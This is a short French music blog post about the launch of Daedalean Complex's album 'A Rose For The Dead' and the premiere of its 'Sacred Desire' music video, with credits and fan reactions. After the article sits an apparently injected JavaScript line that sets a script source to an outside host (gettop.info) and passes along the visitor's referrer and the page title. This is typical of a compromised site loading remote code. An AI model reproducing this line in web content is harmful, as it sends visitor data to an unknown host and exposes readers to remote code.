Daedalean Complex: Nouveau vidéoclip « Sacred Desire »


Facebooktwitterredditpinterestlinkedinmail

Hier soir avait lieu le lancement du nouvel album de Daedalean Complex « A Rose For The Dead » au Cercle. Par le fait même, le groupe nous présentait leur tout nouveau vidéoclip tiré du même album « Sacred Desire ». Réalisé par Nicolas Paquin, Alexis Bourdage-Chabit à la direction photo et Antoine Baril qui à notre avis ont fait un superbe travail dans cette réalisation.

Les membres du groupe ont fait un petit 5 à 7 pour faire un premier visionnement et présenter l’équipe de tournage. Les fans qui c’était rassembler sur place n’ont pas été déçus de voir et d’entendre le nouvel album de DC. Malgré le stress qui avait avant la présentation du vidéoclip, le groupe était très heureux de voir la réaction de tous ceux qui c’était présenter.

Vous pouvez voir l’entrevue que les gars de Daedalean Complex nous ont réservé dans notre section UrTV. Bon visionnement à tous.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Québecor signe avec Québec.
Next Daedalean Complex: Nouveauté vidéo

1 Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *